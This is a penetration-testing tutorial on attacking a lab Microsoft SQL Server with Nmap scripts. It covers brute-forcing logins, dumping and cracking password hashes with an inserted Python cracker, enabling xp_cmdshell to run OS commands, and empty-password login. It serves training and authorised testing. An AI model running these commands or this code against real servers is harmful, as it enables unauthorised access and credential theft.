MSSQL Penetration Testing using Nmap
Hello friends! Today we are going to perform Microsoft SQL Server penetration testing using NMAP scripts in order to retrieve basic information such as database names, usernames, table names and so on from an SQL Server instance running on Windows. In our previous article we set up Microsoft SQL Server on Windows 10.
Attacker: Kali Linux (NMAP)
Target: Windows 10 (MS SQL Server)
Scan port 1433
Open a terminal in Kali Linux and scan the target IP for port 1433 with the following nmap command.
nmap -p 1433 192.168.1.104
From the image below you can observe that port 1433 is open and identified as the ms-sql-s service. Note that 1433 is only the default for the default instance; named instances listen on dynamic ports that are advertised by the SQL Server Browser service on 1434/udp, so if 1433 is closed, scan UDP 1434 (ms-sql-info can also query it) before concluding that no SQL Server is present.
Enumerating version information
The command below attempts to determine configuration and version information for Microsoft SQL Server instances.
nmap -p 1433 --script ms-sql-info 192.168.1.104
In the image below you can observe the installed version and details of the MS-SQL server.
Brute Force Attack
The command below attempts to discover valid usernames and passwords by brute force against MS-SQL, using a username dictionary and a password dictionary.
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104
In the image below you can observe that we successfully retrieved credentials for two users:
- Username: ignite and password: 12345
- Username: sa and password: admin123
Execute MS-SQL Query
Once you have retrieved login credentials, pass them to the NMAP script to execute an MS-SQL query. The command below runs the query "sp_databases" against the Microsoft SQL Server instance.
"sp_databases" is one of the catalog stored procedures and returns a list of the database names on the instance that the login can see.
nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases" 192.168.1.104
As a result it dumped two database names, "ignite" and "master"; master is the default system database of MS-SQL Server, which holds the instance-wide configuration and the login information.
Check Microsoft SQL server configuration
The following command attempts to describe the Microsoft SQL Server configuration settings, passing the login credentials as arguments to the nmap script.
nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
You can check the configuration settings in the image below.
Obtain a list of tables
The following command attempts to fetch a list of tables from inside Microsoft SQL Server, passing the login credentials as arguments to the nmap script.
nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
You can check the list of tables in the image below.
Enumerate NetBIOS information
The NMAP script below enumerates information from remote Microsoft SQL services that have NTLM authentication enabled.
Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials causes the remote service to respond with an NTLMSSP CHALLENGE message that discloses the NetBIOS and DNS names and the OS build version, without any valid credentials.
nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104
From the image below you can read the NetBIOS information of the remote Microsoft SQL server.
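What the ms-sql-ntlm-info probe actually decodes, as an added example that is not part of the original article or of Nmap's own code: the server's reply arrives as an NTLMSSP CHALLENGE (type 2) message inside a TDS SSPI token, and the NetBIOS names, DNS names and OS build live in its target-info AV pairs and Version field. The server message, the TDS framing, the host names and the build number below are constructed for the demo; the dictionary keys mirror the field names the Nmap script prints.

```python
import struct

# NTLMSSP negotiate flags used in the constructed CHALLENGE (MS-NLMP 2.2.2.5)
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_TARGET_TYPE_SERVER = 0x00020000
NTLMSSP_NEGOTIATE_TARGET_INFO = 0x00800000
NTLMSSP_NEGOTIATE_VERSION = 0x02000000

# AV_PAIR ids (MS-NLMP 2.2.2.1) mapped to the names ms-sql-ntlm-info prints
AV_PAIR_NAMES = {1: "NetBIOS_Computer_Name", 2: "NetBIOS_Domain_Name",
                 3: "DNS_Computer_Name", 4: "DNS_Domain_Name", 5: "DNS_Tree_Name"}

HEADER_LEN = 56  # fixed part of a CHALLENGE message, Version field included


def build_challenge(target_name, av_pairs, version=None):
    """Constructed server-side NTLMSSP CHALLENGE (type 2) for the demo."""
    name = target_name.encode("utf-16-le")
    info = b""
    for av_id, value in av_pairs:
        value = value.encode("utf-16-le")
        info += struct.pack("<HH", av_id, len(value)) + value
    info += struct.pack("<HH", 0, 0)  # MsvAvEOL terminator
    flags = NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_TARGET_TYPE_SERVER | NTLMSSP_NEGOTIATE_TARGET_INFO
    if version is None:
        ver = b"\x00" * 8  # Version must be zeroed when the flag is not set
    else:
        flags |= NTLMSSP_NEGOTIATE_VERSION
        major, minor, build = version
        ver = struct.pack("<BBH3xB", major, minor, build, 15)  # NTLMRevisionCurrent = 15
    name_off = HEADER_LEN
    info_off = name_off + len(name)
    msg = b"NTLMSSP\x00" + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(name), len(name), name_off)  # TargetNameFields
    msg += struct.pack("<I", flags)
    msg += b"\x11" * 8                                          # ServerChallenge (constructed)
    msg += b"\x00" * 8                                          # Reserved
    msg += struct.pack("<HHI", len(info), len(info), info_off)  # TargetInfoFields
    return msg + ver + name + info


def wrap_in_tds(ntlm_blob):
    """Constructed TDS tabular-result packet (type 0x04) carrying an SSPI token (0xED)."""
    token = b"\xED" + struct.pack("<H", len(ntlm_blob)) + ntlm_blob
    # TDS header is big-endian: type, status (EOM), length, SPID, packet id, window
    return struct.pack(">BBHHBB", 0x04, 0x01, 8 + len(token), 0, 1, 0) + token


def extract_ntlmssp(tds_packet):
    """Pull the NTLMSSP blob out of the reply; assumes the SSPI token is the first token."""
    if tds_packet[0] != 0x04 or tds_packet[8] != 0xED:
        raise ValueError("not a TDS tabular result with a leading SSPI token")
    (blob_len,) = struct.unpack_from("<H", tds_packet, 9)
    return tds_packet[11:11 + blob_len]


def parse_challenge(msg):
    """Decode the fields ms-sql-ntlm-info reports from a CHALLENGE message."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLMSSP CHALLENGE message")
    tn_len, _, tn_off = struct.unpack_from("<HHI", msg, 12)
    (flags,) = struct.unpack_from("<I", msg, 20)
    ti_len, _, ti_off = struct.unpack_from("<HHI", msg, 40)
    if tn_off + tn_len > len(msg) or ti_off + ti_len > len(msg):
        raise ValueError("payload offsets point outside the message")
    info = {"Target_Name": msg[tn_off:tn_off + tn_len].decode("utf-16-le")}
    if flags & NTLMSSP_NEGOTIATE_VERSION:
        major, minor, build = struct.unpack_from("<BBH", msg, 48)
        info["Product_Version"] = f"{major}.{minor}.{build}"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        pos += 4
        if av_id == 0:  # MsvAvEOL
            break
        if av_id in AV_PAIR_NAMES:
            info[AV_PAIR_NAMES[av_id]] = msg[pos:pos + av_len].decode("utf-16-le")
        pos += av_len
    return info


# Constructed sample exchange: a Windows 10 host DESKTOP-LAB in a made-up lab.local domain
SAMPLE_CHALLENGE = build_challenge(
    "DESKTOP-LAB",
    [(2, "DESKTOP-LAB"), (1, "DESKTOP-LAB"), (4, "lab.local"),
     (3, "desktop-lab.lab.local"), (5, "lab.local")],
    version=(10, 0, 19041),
)
SAMPLE_TDS_RESPONSE = wrap_in_tds(SAMPLE_CHALLENGE)

if __name__ == "__main__":
    for key, value in parse_challenge(extract_ntlmssp(SAMPLE_TDS_RESPONSE)).items():
        print(f"{key}: {value}")
```

Nothing in the exchange is authenticated, which is why the script works with an invalid domain and null credentials: the server hands out its target info before it ever checks a password. A real capture may carry more than one TDS token and the SSPI token may not be first, so a production parser should walk the token stream rather than assume offset 8.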
Dump password hashes
The following command dumps the password hashes from an MS-SQL server in a format suitable for cracking with tools such as John the Ripper or hashcat. To do so the login needs the appropriate privileges: the password_hash column of master.sys.sql_logins is only visible to logins holding CONTROL SERVER permission, which members of sysadmin such as sa have.
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
From the image below you can observe that it dumped the password hash of user sa, whose password we enumerated above.
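Why the ms-sql-dump-hashes output is directly crackable, as an added example that is not from the original article or from Nmap: SQL Server stores a 2-byte header, a 4-byte random salt and a digest of the UTF-16LE password concatenated with the salt (0x0200 with SHA-512 on 2012 and later, 70 bytes; 0x0100 with SHA-1 on 2005 to 2008 R2, 26 bytes). The code below builds both layouts, renders them in the user:0xHEX form the script prints, and runs a small dictionary check. The salt is fixed and constructed so the output is reproducible; the usernames and passwords are the lab credentials recovered in the brute-force step above.

```python
import hashlib
import os


def mssql_hash(password, salt=None, sha512=True):
    """Build a password_hash value in the layout master.sys.sql_logins stores."""
    salt = os.urandom(4) if salt is None else salt
    if len(salt) != 4:
        raise ValueError("SQL Server salts are 4 bytes")
    pw = password.encode("utf-16-le")  # SQL Server hashes the UTF-16LE password
    if sha512:
        # SQL Server 2012 and later: 0x0200 + salt + SHA-512(pw + salt) = 70 bytes
        return b"\x02\x00" + salt + hashlib.sha512(pw + salt).digest()
    # SQL Server 2005 - 2008 R2: 0x0100 + salt + SHA-1(pw + salt) = 26 bytes
    return b"\x01\x00" + salt + hashlib.sha1(pw + salt).digest()


def to_dump_line(username, stored):
    """Render a hash the way ms-sql-dump-hashes prints it (user:0xHEX)."""
    return f"{username}:0x{stored.hex().upper()}"


def parse_dump_line(line):
    """Split a user:0xHEX line back into (username, raw hash bytes)."""
    username, hexhash = line.strip().split(":", 1)
    if not hexhash.lower().startswith("0x"):
        raise ValueError("expected a 0x-prefixed hex hash")
    return username, bytes.fromhex(hexhash[2:])


def verify_mssql_hash(candidate, stored):
    """Return True if candidate is the password behind a stored hash."""
    header, salt = stored[:2], stored[2:6]
    pw = candidate.encode("utf-16-le")
    if header == b"\x02\x00" and len(stored) == 70:
        return hashlib.sha512(pw + salt).digest() == stored[6:]
    if header == b"\x01\x00" and len(stored) in (26, 46):
        # 46 bytes is the SQL Server 2000 layout: a case-sensitive SHA-1
        # followed by a SHA-1 of the upper-cased password; check the first.
        return hashlib.sha1(pw + salt).digest() == stored[6:26]
    raise ValueError("unrecognised hash header or length")


def crack(dump_lines, wordlist):
    """Dictionary attack over dump lines; returns {user: password} for every hit."""
    found = {}
    for line in dump_lines:
        username, stored = parse_dump_line(line)
        for candidate in wordlist:
            if verify_mssql_hash(candidate, stored):
                found[username] = candidate
                break
    return found


# Constructed sample dump: fixed salt for reproducibility, lab credentials from above
SAMPLE_SALT = bytes.fromhex("DEADBEEF")
SAMPLE_DUMP = [
    to_dump_line("sa", mssql_hash("admin123", SAMPLE_SALT)),                 # 2012+ layout
    to_dump_line("ignite", mssql_hash("12345", SAMPLE_SALT, sha512=False)),  # 2005 layout
]

if __name__ == "__main__":
    for line in SAMPLE_DUMP:
        print(line)
    print(crack(SAMPLE_DUMP, ["password", "Password1", "12345", "admin123"]))
```

The salt is per login, so a dictionary has to be re-hashed for every row, but a single unsalted, unstretched SHA-512 or SHA-1 is cheap; this is why even a strong-looking sysadmin password does not survive long once the hashes leave the server. The header byte tells the cracker which mode to use (John's mssql05 and mssql12 formats, respectively).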
Identify accessible databases and their owners
The following command queries the Microsoft SQL Server instance for the list of databases the supplied login has access to, together with the owner of each. To do so the login needs the appropriate DB privileges, so we again pass the username and password as arguments to the NMAP script.
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
In the image below you can observe that it shows user sa as the owner of the database "ignite".
Enable the xp_cmdshell option in MS-SQL
xp_cmdshell is an extended stored procedure of Microsoft SQL Server that spawns a Windows command shell and runs an operating-system command, for sysadmin logins in the security context of the SQL Server service account. By default the xp_cmdshell option is disabled.
From the image below you can see that we enabled xp_cmdshell by executing the following statements inside the master database. xp_cmdshell is an advanced option, so 'show advanced options' has to be switched on first:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
Now apply the above configuration setting with the following statement:
RECONFIGURE;
Exploit XP_cmdshell Function
The following NMAP script attempts to run a command through the command shell of Microsoft SQL Server if xp_cmdshell is found enabled on the target.
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.104
From the image below you can confirm that we executed the OS command net user and retrieved the list of local user accounts.
Blank password leads to unauthorized access
If the admin of Microsoft SQL Server leaves the password of a login blank, an attacker can log straight into the database server. In the image below we are viewing the properties of the login account "sa".
Here the password of "sa" has been left blank (empty). As we know, sa is by default the administrator of MS-SQL Server, and with its password empty the chance of an attacker gaining unauthorized access to the server increases sharply.
Make unauthorized access into SQL server
The following NMAP script tries to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.
nmap -p 1433 --script ms-sql-empty-password 192.168.1.104
From the image below you can see that we successfully logged in as user sa with an empty password.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher Contact Here